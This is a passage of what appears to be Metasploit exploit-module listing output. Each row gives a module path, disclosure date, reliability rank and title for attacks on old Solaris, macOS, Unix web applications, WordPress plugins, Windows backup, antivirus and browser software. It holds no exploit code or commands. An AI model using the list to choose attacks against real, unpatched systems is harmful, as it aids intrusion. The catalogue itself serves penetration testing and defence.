   multi/postgres/postgres_createlang                                2016-01-01       good       PostgreSQL CREATE LANGUAGE Execution
   multi/realserver/describe                                         2002-12-20       great      RealServer Describe Buffer Overflow
   multi/samba/nttrans                                               2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   multi/samba/usermap_script                                        2007-05-14       excellent  Samba "username map script" Command Execution
   multi/sap/sap_mgmt_con_osexec_payload                             2011-03-08       excellent  SAP Management Console OSExecute Payload Execution
   multi/sap/sap_soap_rfc_sxpg_call_system_exec                      2013-03-26       great      SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution
   multi/sap/sap_soap_rfc_sxpg_command_exec                          2012-05-08       great      SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution
   multi/script/web_delivery                                         2013-07-19       manual     Script Web Delivery
   multi/ssh/sshexec                                                 1999-01-01       manual     SSH User Code Execution
   multi/svn/svnserve_date                                           2004-05-19       average    Subversion Date Svnserve
   multi/upnp/libupnp_ssdp_overflow                                  2013-01-29       normal     Portable UPnP SDK unique_service_name() Remote Code Execution
   multi/vnc/vnc_keyboard_exec                                       2015-07-10       great      VNC Keyboard Remote Code Execution
   multi/vpn/tincd_bof                                               2013-04-22       average    Tincd Post-Authentication Remote TCP Stack Buffer Overflow
   multi/wyse/hagent_untrusted_hsdata                                2009-07-10       excellent  Wyse Rapport Hagent Fake Hserver Command Execution
   netware/smb/lsass_cifs                                            2007-01-21       average    Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow
   netware/sunrpc/pkernel_callit                                     2009-09-30       good       NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow
   osx/afp/loginext                                                  2004-05-03       average    AppleFileServer LoginExt PathName Overflow
   osx/arkeia/type77                                                 2005-02-18       average    Arkeia Backup Client Type 77 Overflow (Mac OS X)
   osx/browser/mozilla_mchannel                                      2011-05-10       normal     Mozilla Firefox 3.6.16 mChannel Use-After-Free
   osx/browser/safari_file_policy                                    2011-10-12       normal     Apple Safari file:// Arbitrary Code Execution
   osx/browser/safari_metadata_archive                               2006-02-21       excellent  Safari Archive Metadata Command Execution
   osx/browser/safari_user_assisted_applescript_exec                 2015-10-16       manual     Safari User-Assisted Applescript Exec Attack
   osx/browser/safari_user_assisted_download_launch                  2014-03-10       manual     Safari User-Assisted Download and Run Attack
   osx/browser/software_update                                       2007-12-17       excellent  Apple OS X Software Update Command Execution
   osx/email/mailapp_image_exec                                      2006-03-01       manual     Mail.app Image Attachment Command Execution
   osx/ftp/webstar_ftp_user                                          2004-07-13       average    WebSTAR FTP Server USER Overflow
   osx/http/evocam_webserver                                         2010-06-01       average    MacOS X EvoCam HTTP GET Buffer Overflow
   osx/local/dyld_print_to_file_root                                 2015-07-21       great      Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation
   osx/local/iokit_keyboard_root                                     2014-09-24       manual     Mac OS X IOKit Keyboard Driver Root Privilege Escalation
   osx/local/nfs_mount_root                                          2014-04-11       normal     Mac OS X NFS Mount Privilege Escalation Exploit
   osx/local/persistence                                             2012-04-01       excellent  Mac OS X Persistent Payload Installer
   osx/local/rootpipe                                                2015-04-09       great      Apple OS X Rootpipe Privilege Escalation
   osx/local/rootpipe_entitlements                                   2015-07-01       great      Apple OS X Entitlements Rootpipe Privilege Escalation
   osx/local/rsh_libmalloc                                           2015-10-01       normal     Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation
   osx/local/setuid_tunnelblick                                      2012-08-11       excellent  Setuid Tunnelblick Privilege Escalation
   osx/local/setuid_viscosity                                        2012-08-12       excellent  Viscosity setuid-set ViscosityHelper Privilege Escalation
   osx/local/sudo_password_bypass                                    2013-02-28       normal     Mac OS X Sudo Password Bypass
   osx/local/tpwn                                                    2015-08-16       normal     Mac OS X "tpwn" Privilege Escalation
   osx/local/vmware_bash_function_root                               2014-09-24       normal     OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
   osx/mdns/upnp_location                                            2007-05-25       average    Mac OS X mDNSResponder UPnP Location Overflow
   osx/misc/ufo_ai                                                   2009-10-28       average    UFO: Alien Invasion IRC Client Buffer Overflow
   osx/rtsp/quicktime_rtsp_content_type                              2007-11-23       average    MacOS X QuickTime RTSP Content-Type Overflow
   osx/samba/lsa_transnames_heap                                     2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   osx/samba/trans2open                                              2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)
   solaris/dtspcd/heap_noir                                          2002-07-10       great      Solaris dtspcd Heap Overflow
   solaris/lpd/sendmail_exec                                         2001-08-31       excellent  Solaris LPD Command Execution
   solaris/samba/lsa_transnames_heap                                 2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   solaris/samba/trans2open                                          2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)
   solaris/sunrpc/sadmind_adm_build_path                             2008-10-14       great      Sun Solaris sadmind adm_build_path() Buffer Overflow
   solaris/sunrpc/sadmind_exec                                       2003-09-13       excellent  Solaris sadmind Command Execution
   solaris/sunrpc/ypupdated_exec                                     1994-12-12       excellent  Solaris ypupdated Command Execution
   solaris/telnet/fuser                                              2007-02-12       excellent  Sun Solaris Telnet Remote Authentication Bypass Vulnerability
   solaris/telnet/ttyprompt                                          2002-01-18       excellent  Solaris in.telnetd TTYPROMPT Buffer Overflow
   unix/dhcp/bash_environment                                        2014-09-24       excellent  Dhclient Bash Environment Variable Injection (Shellshock)
   unix/fileformat/ghostscript_type_confusion                        2017-04-27       excellent  Ghostscript Type Confusion Arbitrary Command Execution
   unix/fileformat/imagemagick_delegate                              2016-05-03       excellent  ImageMagick Delegate Arbitrary Command Execution
   unix/ftp/proftpd_133c_backdoor                                    2010-12-02       excellent  ProFTPD-1.3.3c Backdoor Command Execution
   unix/ftp/proftpd_modcopy_exec                                     2015-04-22       excellent  ProFTPD 1.3.5 Mod_Copy Command Execution
   unix/ftp/vsftpd_234_backdoor                                      2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution
   unix/http/contentkeeperweb_mimencode                              2009-02-25       excellent  ContentKeeper Web Remote Command Execution
   unix/http/ctek_skyrouter                                          2011-09-08       average    CTEK SkyRouter 4200 and 4300 Command Execution
   unix/http/dell_kace_k1000_upload                                  2014-03-07       excellent  Dell KACE K1000 File Upload
   unix/http/freepbx_callmenum                                       2012-03-20       manual     FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution
   unix/http/lifesize_room                                           2011-07-13       excellent  LifeSize Room Command Injection
   unix/http/tnftp_savefile                                          2014-10-28       excellent  tnftp "savefile" Arbitrary Command Execution
   unix/http/twiki_debug_plugins                                     2014-10-09       excellent  TWiki Debugenableplugins Remote Code Execution
   unix/http/vmturbo_vmtadmin_exec_noauth                            2014-06-25       excellent  VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution
   unix/irc/unreal_ircd_3281_backdoor                                2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution
   unix/local/at_persistence                                         1997-01-01       excellent  at(1) Persistence
   unix/local/chkrootkit                                             2014-06-04       manual     Chkrootkit Local Privilege Escalation
   unix/local/exim_perl_startup                                      2016-03-10       excellent  Exim "perl_startup" Privilege Escalation
   unix/local/netbsd_mail_local                                      2016-07-07       excellent  NetBSD mail.local Privilege Escalation
   unix/local/setuid_nmap                                            2012-07-19       excellent  Setuid Nmap Exploit
   unix/misc/distcc_exec                                             2002-02-01       excellent  DistCC Daemon Command Execution
   unix/misc/qnx_qconn_exec                                          2012-09-04       excellent  QNX QCONN Remote Command Execution Vulnerability
   unix/misc/spamassassin_exec                                       2006-06-06       excellent  SpamAssassin spamd Remote Command Execution
   unix/misc/xerox_mfp                                               2012-03-07       good       Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability
   unix/misc/zabbix_agent_exec                                       2009-09-10       excellent  Zabbix Agent net.tcp.listen Command Injection
   unix/polycom_hdx_auth_bypass                                      2013-01-18       normal     Polycom Command Shell Authorization Bypass
   unix/smtp/clamav_milter_blackhole                                 2007-08-24       excellent  ClamAV Milter Blackhole-Mode Remote Code Execution
   unix/smtp/exim4_string_format                                     2010-12-07       excellent  Exim4 string_format Function Heap Buffer Overflow
   unix/smtp/qmail_bash_env_exec                                     2014-09-24       normal     Qmail SMTP Bash Environment Variable Injection (Shellshock)
   unix/ssh/array_vxag_vapv_privkey_privesc                          2014-02-03       excellent  Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution
   unix/ssh/tectia_passwd_changereq                                  2012-12-01       excellent  Tectia SSH USERAUTH Change Request Password Reset Vulnerability
   unix/webapp/actualanalyzer_ant_cookie_exec                        2014-08-28       excellent  ActualAnalyzer 'ant' Cookie Command Execution
   unix/webapp/arkeia_upload_exec                                    2013-09-16       excellent  Western Digital Arkeia Remote Code Execution
   unix/webapp/awstats_configdir_exec                                2005-01-15       excellent  AWStats configdir Remote Command Execution
   unix/webapp/awstats_migrate_exec                                  2006-05-04       excellent  AWStats migrate Remote Command Execution
   unix/webapp/awstatstotals_multisort                               2008-08-26       excellent  AWStats Totals multisort Remote Command Execution
   unix/webapp/barracuda_img_exec                                    2005-09-01       excellent  Barracuda IMG.PL Remote Command Execution
   unix/webapp/base_qry_common                                       2008-06-14       excellent  BASE base_qry_common Remote File Include
   unix/webapp/basilic_diff_exec                                     2012-06-28       excellent  Basilic 1.5.14 diff.php Arbitrary Command Execution
   unix/webapp/cacti_graphimage_exec                                 2005-01-15       excellent  Cacti graph_view.php Remote Command Execution
   unix/webapp/cakephp_cache_corruption                              2010-11-15       excellent  CakePHP Cache Corruption Code Execution
   unix/webapp/carberp_backdoor_exec                                 2013-06-28       great      Carberp Web Panel C2 Backdoor Remote PHP Code Execution
   unix/webapp/citrix_access_gateway_exec                            2010-12-21       excellent  Citrix Access Gateway Command Execution
   unix/webapp/clipbucket_upload_exec                                2013-10-04       excellent  ClipBucket Remote Code Execution
   unix/webapp/coppermine_piceditor                                  2008-01-30       excellent  Coppermine Photo Gallery picEditor.php Command Execution
   unix/webapp/datalife_preview_exec                                 2013-01-28       excellent  DataLife Engine preview.php PHP Code Injection
   unix/webapp/dogfood_spell_exec                                    2009-03-03       excellent  Dogfood CRM spell.php Remote Command Execution
   unix/webapp/drupal_coder_exec                                     2016-07-13       excellent  Drupal CODER Module Remote Command Execution
   unix/webapp/drupal_restws_exec                                    2016-07-13       excellent  Drupal RESTWS Module Remote PHP Code Execution
   unix/webapp/egallery_upload_exec                                  2012-07-08       excellent  EGallery PHP File Upload Vulnerability
   unix/webapp/flashchat_upload_exec                                 2013-10-04       excellent  FlashChat Arbitrary File Upload
   unix/webapp/foswiki_maketext                                      2012-12-03       excellent  Foswiki MAKETEXT Remote Command Execution
   unix/webapp/freepbx_config_exec                                   2014-03-21       excellent  FreePBX config.php Remote Code Execution
   unix/webapp/generic_exec                                          1993-11-14       excellent  Generic Web Application Unix Command Execution
   unix/webapp/get_simple_cms_upload_exec                            2014-01-04       excellent  GetSimpleCMS PHP File Upload Vulnerability
   unix/webapp/google_proxystylesheet_exec                           2005-08-16       excellent  Google Appliance ProxyStyleSheet Command Execution
   unix/webapp/graphite_pickle_exec                                  2013-08-20       excellent  Graphite Web Unsafe Pickle Handling
   unix/webapp/guestbook_ssi_exec                                    1999-11-05       excellent  Matt Wright guestbook.pl Arbitrary Command Execution
   unix/webapp/hastymail_exec                                        2011-11-22       excellent  Hastymail 2.1.1 RC1 Command Injection
   unix/webapp/havalite_upload_exec                                  2013-06-17       excellent  Havalite CMS Arbitary File Upload Vulnerability
   unix/webapp/horde_unserialize_exec                                2013-06-27       excellent  Horde Framework Unserialize PHP Code Execution
   unix/webapp/hybridauth_install_php_exec                           2014-08-04       manual     HybridAuth install.php PHP Code Execution
   unix/webapp/instantcms_exec                                       2013-06-26       excellent  InstantCMS 1.6 Remote PHP Code Execution
   unix/webapp/invision_pboard_unserialize_exec                      2012-10-25       excellent  Invision IP.Board unserialize() PHP Code Execution
   unix/webapp/joomla_akeeba_unserialize                             2014-09-29       excellent  Joomla Akeeba Kickstart Unserialize Remote Code Execution
   unix/webapp/joomla_comjce_imgmanager                              2012-08-02       excellent  Joomla Component JCE File Upload Remote Code Execution
   unix/webapp/joomla_contenthistory_sqli_rce                        2015-10-23       excellent  Joomla Content History SQLi Remote Code Execution
   unix/webapp/joomla_media_upload_exec                              2013-08-01       excellent  Joomla Media Manager File Upload Vulnerability
   unix/webapp/joomla_tinybrowser                                    2009-07-22       excellent  Joomla 1.5.12 TinyBrowser File Upload Code Execution
   unix/webapp/kimai_sqli                                            2013-05-21       average    Kimai v0.9.2 'db_restore.php' SQL Injection
   unix/webapp/libretto_upload_exec                                  2013-06-14       excellent  LibrettoCMS File Manager Arbitary File Upload Vulnerability
   unix/webapp/maarch_letterbox_file_upload                          2015-02-11       excellent  Maarch LetterBox Unrestricted File Upload
   unix/webapp/mambo_cache_lite                                      2008-06-14       excellent  Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include
   unix/webapp/mitel_awc_exec                                        2010-12-12       excellent  Mitel Audio and Web Conferencing Command Injection
   unix/webapp/moinmoin_twikidraw                                    2012-12-30       manual     MoinMoin twikidraw Action Traversal File Upload
   unix/webapp/mybb_backdoor                                         2011-10-06       excellent  myBB 1.6.4 Backdoor Arbitrary Command Execution
   unix/webapp/nagios3_history_cgi                                   2012-12-09       great      Nagios3 history.cgi Host Command Execution
   unix/webapp/nagios3_statuswml_ping                                2009-06-22       excellent  Nagios3 statuswml.cgi Ping Command Execution
   unix/webapp/nagios_graph_explorer                                 2012-11-30       excellent  Nagios XI Network Monitor Graph Explorer Component Command Injection
   unix/webapp/narcissus_backend_exec                                2012-11-14       excellent  Narcissus Image Configuration Passthru Vulnerability
   unix/webapp/open_flash_chart_upload_exec                          2009-12-14       great      Open Flash Chart v2 Arbitrary File Upload
   unix/webapp/openemr_sqli_privesc_upload                           2013-09-16       excellent  OpenEMR 4.1.1 Patch 14 SQLi Privilege Escalation Remote Code Execution
   unix/webapp/openemr_upload_exec                                   2013-02-13       excellent  OpenEMR PHP File Upload Vulnerability
   unix/webapp/opensis_modname_exec                                  2012-12-04       excellent  OpenSIS 'modname' PHP Code Execution
   unix/webapp/openview_connectednodes_exec                          2005-08-25       excellent  HP Openview connectedNodes.ovpl Remote Command Execution
   unix/webapp/openx_banner_edit                                     2009-11-24       excellent  OpenX banner-edit.php File Upload PHP Code Execution
   unix/webapp/oracle_vm_agent_utl                                   2010-10-12       excellent  Oracle VM Server Virtual Server Agent Command Injection
   unix/webapp/oscommerce_filemanager                                2009-08-31       excellent  osCommerce 2.2 Arbitrary PHP Code Execution
   unix/webapp/pajax_remote_exec                                     2006-03-30       excellent  PAJAX Remote Command Execution
   unix/webapp/php_charts_exec                                       2013-01-16       excellent  PHP-Charts v1.0 PHP Code Execution Vulnerability
   unix/webapp/php_eval                                              2008-10-13       manual     Generic PHP Code Evaluation
   unix/webapp/php_include                                           2006-12-17       normal     PHP Remote File Include Generic Code Execution
   unix/webapp/php_vbulletin_template                                2005-02-25       excellent  vBulletin misc.php Template Name Arbitrary Code Execution
   unix/webapp/php_xmlrpc_eval                                       2005-06-29       excellent  PHP XML-RPC Arbitrary Code Execution
   unix/webapp/phpbb_highlight                                       2004-11-12       excellent  phpBB viewtopic.php Arbitrary Code Execution
   unix/webapp/phpmyadmin_config                                     2009-03-24       excellent  PhpMyAdmin Config File Code Injection
   unix/webapp/piwik_superuser_plugin_upload                         2017-02-05       excellent  Piwik Superuser Plugin Upload
   unix/webapp/projectpier_upload_exec                               2012-10-08       excellent  Project Pier Arbitrary File Upload Vulnerability
   unix/webapp/projectsend_upload_exec                               2014-12-02       excellent  ProjectSend Arbitrary File Upload
   unix/webapp/qtss_parse_xml_exec                                   2003-02-24       excellent  QuickTime Streaming Server parse_xml.cgi Remote Execution
   unix/webapp/redmine_scm_exec                                      2010-12-19       excellent  Redmine SCM Repository Arbitrary Command Execution
   unix/webapp/seportal_sqli_exec                                    2014-03-20       excellent  SePortal SQLi Remote Code Execution
   unix/webapp/simple_e_document_upload_exec                         2014-01-23       excellent  Simple E-Document Arbitrary File Upload
   unix/webapp/sixapart_movabletype_storable_exec                    2015-02-11       good       SixApart MovableType Storable Perl Code Execution
   unix/webapp/skybluecanvas_exec                                    2014-01-28       excellent  SkyBlueCanvas CMS Remote Code Execution
   unix/webapp/sphpblog_file_upload                                  2005-08-25       excellent  Simple PHP Blog Remote Command Execution
   unix/webapp/spip_connect_exec                                     2012-07-04       excellent  SPIP connect Parameter PHP Injection
   unix/webapp/squash_yaml_exec                                      2013-08-06       excellent  Squash YAML Code Execution
   unix/webapp/squirrelmail_pgp_plugin                               2007-07-09       manual     SquirrelMail PGP Plugin Command Execution (SMTP)
   unix/webapp/sugarcrm_rest_unserialize_exec                        2016-06-23       excellent  SugarCRM REST Unserialize PHP Code Execution
   unix/webapp/sugarcrm_unserialize_exec                             2012-06-23       excellent  SugarCRM unserialize() PHP Code Execution
   unix/webapp/tikiwiki_graph_formula_exec                           2007-10-10       excellent  TikiWiki tiki-graph_formula Remote PHP Code Execution
   unix/webapp/tikiwiki_jhot_exec                                    2006-09-02       excellent  TikiWiki jhot Remote Command Execution
   unix/webapp/tikiwiki_unserialize_exec                             2012-07-04       excellent  Tiki Wiki unserialize() PHP Code Execution
   unix/webapp/tikiwiki_upload_exec                                  2016-07-11       excellent  Tiki Wiki Unauthenticated File Upload Vulnerability
   unix/webapp/trixbox_langchoice                                    2008-07-09       manual     Trixbox langChoice PHP Local File Inclusion
   unix/webapp/tuleap_unserialize_exec                               2014-11-27       excellent  Tuleap PHP Unserialize Code Execution
   unix/webapp/twiki_history                                         2005-09-14       excellent  TWiki History TWikiUsers rev Parameter Command Execution
   unix/webapp/twiki_maketext                                        2012-12-15       excellent  TWiki MAKETEXT Remote Command Execution
   unix/webapp/twiki_search                                          2004-10-01       excellent  TWiki Search Function Arbitrary Command Execution
   unix/webapp/vbulletin_vote_sqli_exec                              2013-03-25       excellent  vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection
   unix/webapp/vicidial_manager_send_cmd_exec                        2013-10-23       excellent  VICIdial Manager Send OS Command Injection
   unix/webapp/vicidial_user_authorization_unauth_cmd_exec           2017-05-26       excellent  VICIdial user_authorization Unauthenticated Command Execution
   unix/webapp/webmin_show_cgi_exec                                  2012-09-06       excellent  Webmin /file/show.cgi Remote Command Execution
   unix/webapp/webtester_exec                                        2013-10-17       excellent  WebTester 5.x Command Execution
   unix/webapp/wp_admin_shell_upload                                 2015-02-21       excellent  WordPress Admin Shell Upload
   unix/webapp/wp_advanced_custom_fields_exec                        2012-11-14       excellent  WordPress Plugin Advanced Custom Fields Remote File Inclusion
   unix/webapp/wp_ajax_load_more_file_upload                         2015-10-10       excellent  Wordpress Ajax Load More PHP Upload Vulnerability
   unix/webapp/wp_asset_manager_upload_exec                          2012-05-26       excellent  WordPress Asset-Manager PHP File Upload Vulnerability
   unix/webapp/wp_creativecontactform_file_upload                    2014-10-22       excellent  Wordpress Creative Contact Form Upload Vulnerability
   unix/webapp/wp_downloadmanager_upload                             2014-12-03       excellent  Wordpress Download Manager (download-manager) Unauthenticated File Upload
   unix/webapp/wp_easycart_unrestricted_file_upload                  2015-01-08       excellent  WordPress WP EasyCart Unrestricted File Upload
   unix/webapp/wp_foxypress_upload                                   2012-06-05       excellent  WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution
   unix/webapp/wp_frontend_editor_file_upload                        2012-07-04       excellent  Wordpress Front-end Editor File Upload
   unix/webapp/wp_google_document_embedder_exec                      2013-01-03       normal     WordPress Plugin Google Document Embedder Arbitrary File Disclosure
   unix/webapp/wp_holding_pattern_file_upload                        2015-02-11       excellent  WordPress Holding Pattern Theme Arbitrary File Upload
   unix/webapp/wp_inboundio_marketing_file_upload                    2015-03-24       excellent  Wordpress InBoundio Marketing PHP Upload Vulnerability
   unix/webapp/wp_infusionsoft_upload                                2014-09-25       excellent  Wordpress InfusionSoft Upload Vulnerability
   unix/webapp/wp_lastpost_exec                                      2005-08-09       excellent  WordPress cache_lastpostdate Arbitrary Code Execution
   unix/webapp/wp_mobile_detector_upload_execute                     2016-05-31       excellent  WordPress WP Mobile Detector 3.5 Shell Upload
   unix/webapp/wp_ninja_forms_unauthenticated_file_upload            2016-05-04       excellent  WordPress Ninja Forms Unauthenticated File Upload
   unix/webapp/wp_nmediawebsite_file_upload                          2015-04-12       excellent  Wordpress N-Media Website Contact Form Upload Vulnerability
   unix/webapp/wp_optimizepress_upload                               2013-11-29       excellent  WordPress OptimizePress Theme File Upload Vulnerability
   unix/webapp/wp_photo_gallery_unrestricted_file_upload             2014-11-11       excellent  WordPress Photo Gallery Unrestricted File Upload
   unix/webapp/wp_phpmailer_host_header                              2017-05-03       average    WordPress PHPMailer Host Header Command Injection
   unix/webapp/wp_pixabay_images_upload                              2015-01-19       excellent  WordPress Pixabay Images PHP Code Upload
   unix/webapp/wp_platform_exec                                      2015-01-21       excellent  WordPress Platform Theme File Upload Vulnerability
   unix/webapp/wp_property_upload_exec                               2012-03-26       excellent  WordPress WP-Property PHP File Upload Vulnerability
   unix/webapp/wp_reflexgallery_file_upload                          2012-12-30       excellent  Wordpress Reflex Gallery Upload Vulnerability
   unix/webapp/wp_revslider_upload_execute                           2014-11-26       excellent  WordPress RevSlider File Upload and Execute Vulnerability
   unix/webapp/wp_slideshowgallery_upload                            2014-08-28       excellent  Wordpress SlideShow Gallery Authenticated File Upload
   unix/webapp/wp_symposium_shell_upload                             2014-12-11       excellent  WordPress WP Symposium 14.11 Shell Upload
   unix/webapp/wp_total_cache_exec                                   2013-04-17       excellent  WordPress W3 Total Cache PHP Code Execution
   unix/webapp/wp_worktheflow_upload                                 2015-03-14       excellent  Wordpress Work The Flow Upload Vulnerability
   unix/webapp/wp_wpshop_ecommerce_file_upload                       2015-03-09       excellent  WordPress WPshop eCommerce Arbitrary File Upload Vulnerability
   unix/webapp/wp_wptouch_file_upload                                2014-07-14       excellent  WordPress WPTouch Authenticated File Upload
   unix/webapp/wp_wysija_newsletters_upload                          2014-07-01       excellent  Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload
   unix/webapp/xoda_file_upload                                      2012-08-21       excellent  XODA 0.4.5 Arbitrary PHP File Upload Vulnerability
   unix/webapp/zeroshell_exec                                        2013-09-22       excellent  ZeroShell Remote Code Execution
   unix/webapp/zimbra_lfi                                            2013-12-06       excellent  Zimbra Collaboration Server LFI
   unix/webapp/zoneminder_packagecontrol_exec                        2013-01-22       excellent  ZoneMinder Video Server packageControl Command Execution
   unix/webapp/zpanel_username_exec                                  2013-06-07       excellent  ZPanel 10.0.0.2 htpasswd Module Username Command Execution
   unix/x11/x11_keyboard_exec                                        2015-07-10       excellent  X11 Keyboard Command Injection
   windows/antivirus/ams_hndlrsvc                                    2010-07-26       excellent  Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution
   windows/antivirus/ams_xfr                                         2009-04-28       excellent  Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution
   windows/antivirus/symantec_endpoint_manager_rce                   2014-02-24       excellent  Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution
   windows/antivirus/symantec_iao                                    2009-04-28       good       Symantec Alert Management System Intel Alert Originator Service Buffer Overflow
   windows/antivirus/symantec_rtvscan                                2006-05-24       good       Symantec Remote Management Buffer Overflow
   windows/antivirus/symantec_workspace_streaming_exec               2014-05-12       excellent  Symantec Workspace Streaming ManagementAgentServer.putFile XMLRPC Request Arbitrary File Upload
   windows/antivirus/trendmicro_serverprotect                        2007-02-20       good       Trend Micro ServerProtect 5.58 Buffer Overflow
   windows/antivirus/trendmicro_serverprotect_createbinding          2007-05-07       good       Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow
   windows/antivirus/trendmicro_serverprotect_earthagent             2007-05-07       good       Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow
   windows/arkeia/type77                                             2005-02-18       good       Arkeia Backup Client Type 77 Overflow (Win32)
   windows/backdoor/energizer_duo_payload                            2010-03-05       excellent  Energizer DUO USB Battery Charger Arucer.dll Trojan Code Execution
   windows/backupexec/name_service                                   2004-12-16       average    Veritas Backup Exec Name Service Overflow
   windows/backupexec/remote_agent                                   2005-06-22       great      Veritas Backup Exec Windows Remote Agent Overflow
   windows/backupexec/ssl_uaf                                        2017-05-10       normal     Veritas/Symantec Backup Exec SSL NDMP Connection Use-After-Free
   windows/brightstor/ca_arcserve_342                                2008-10-09       average    Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow
   windows/brightstor/discovery_tcp                                  2005-02-14       average    CA BrightStor Discovery Service TCP Overflow
   windows/brightstor/discovery_udp                                  2004-12-20       average    CA BrightStor Discovery Service Stack Buffer Overflow
   windows/brightstor/etrust_itm_alert                               2008-04-04       average    Computer Associates Alert Notification Buffer Overflow
   windows/brightstor/hsmserver                                      2007-09-27       great      CA BrightStor HSM Buffer Overflow
   windows/brightstor/lgserver                                       2007-01-31       average    CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow
   windows/brightstor/lgserver_multi                                 2007-06-06       average    CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow
   windows/brightstor/lgserver_rxrlogin                              2007-06-06       average    CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow
   windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter     2007-06-06       average    CA BrightStor ARCserve for Laptops and Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow
   windows/brightstor/lgserver_rxsuselicenseini                      2007-06-06       average    CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow
   windows/brightstor/license_gcr                                    2005-03-02       average    CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow
   windows/brightstor/mediasrv_sunrpc                                2007-04-25       average    CA BrightStor ArcServe Media Service Stack Buffer Overflow
   windows/brightstor/message_engine                                 2007-01-11       average    CA BrightStor ARCserve Message Engine Buffer Overflow
   windows/brightstor/message_engine_72                              2010-10-04       average    CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow
   windows/brightstor/message_engine_heap                            2006-10-05       average    CA BrightStor ARCserve Message Engine Heap Overflow
   windows/brightstor/sql_agent                                      2005-08-02       average    CA BrightStor Agent for Microsoft SQL Overflow
   windows/brightstor/tape_engine                                    2006-11-21       average    CA BrightStor ARCserve Tape Engine Buffer Overflow
   windows/brightstor/tape_engine_0x8a                               2010-10-04       average    CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow
   windows/brightstor/universal_agent                                2005-04-11       average    CA BrightStor Universal Agent Overflow
   windows/browser/adobe_cooltype_sing                               2010-09-07       great      Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
   windows/browser/adobe_flash_avm2                                  2014-02-05       normal     Adobe Flash Player Integer Underflow Remote Code Execution
   windows/browser/adobe_flash_casi32_int_overflow                   2014-10-14       great      Adobe Flash Player casi32 Integer Overflow
   windows/browser/adobe_flash_copy_pixels_to_byte_array             2014-09-23       great      Adobe Flash Player copyPixelsToByteArray Method Integer Overflow
   windows/browser/adobe_flash_domain_memory_uaf                     2014-04-14       great      Adobe Flash Player domainMemory ByteArray Use After Free
   windows/browser/adobe_flash_filters_type_confusion                2013-12-10       normal     Adobe Flash Player Type Confusion Remote Code Execution
   windows/browser/adobe_flash_mp4_cprt                              2012-02-15       normal     Adobe Flash Player MP4 'cprt' Overflow
   windows/browser/adobe_flash_otf_font                              2012-08-09       normal     Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow
   windows/browser/adobe_flash_pcre                                  2014-11-25       normal     Adobe Flash Player PCRE Regex Vulnerability
   windows/browser/adobe_flash_regex_value                           2013-02-08       normal     Adobe Flash Player Regular Expression Heap Overflow
   windows/browser/adobe_flash_rtmp                                  2012-05-04       normal     Adobe Flash Player Object Type Confusion
   windows/browser/adobe_flash_sps                                   2011-08-09       normal     Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
   windows/browser/adobe_flash_uncompress_zlib_uninitialized         2014-11-11       good       Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory
   windows/browser/adobe_flash_worker_byte_array_uaf                 2015-02-02       great      Adobe Flash Player ByteArray With Workers Use After Free
   windows/browser/adobe_flashplayer_arrayindexing                   2012-06-21       great      Adobe Flash Player AVM Verification Logic Array Indexing Code Execution
   windows/browser/adobe_flashplayer_avm                             2011-03-15       good       Adobe Flash Player AVM Bytecode Verification Vulnerability
   windows/browser/adobe_flashplayer_flash10o                        2011-04-11       normal     Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
   windows/browser/adobe_flashplayer_newfunction                     2010-06-04       normal     Adobe Flash Player "newfunction" Invalid Pointer Use
   windows/browser/adobe_flatedecode_predictor02                     2009-10-08       good       Adobe FlateDecode Stream Predictor 02 Integer Overflow
   windows/browser/adobe_geticon                                     2009-03-24       good       Adobe Collab.getIcon() Buffer Overflow
   windows/browser/adobe_jbig2decode                                 2009-02-19       good       Adobe JBIG2Decode Heap Corruption
   windows/browser/adobe_media_newplayer                             2009-12-14       good       Adobe Doc.media.newPlayer Use After Free Vulnerability
   windows/browser/adobe_shockwave_rcsl_corruption                   2010-10-21       normal     Adobe Shockwave rcsL Memory Corruption
   windows/browser/adobe_toolbutton                                  2013-08-08       normal     Adobe Reader ToolButton Use After Free
   windows/browser/adobe_utilprintf                                  2008-02-08       good       Adobe util.printf() Buffer Overflow
   windows/browser/advantech_webaccess_dvs_getcolor                  2014-07-17       normal     Advantech WebAccess dvs.ocx GetColor Buffer Overflow
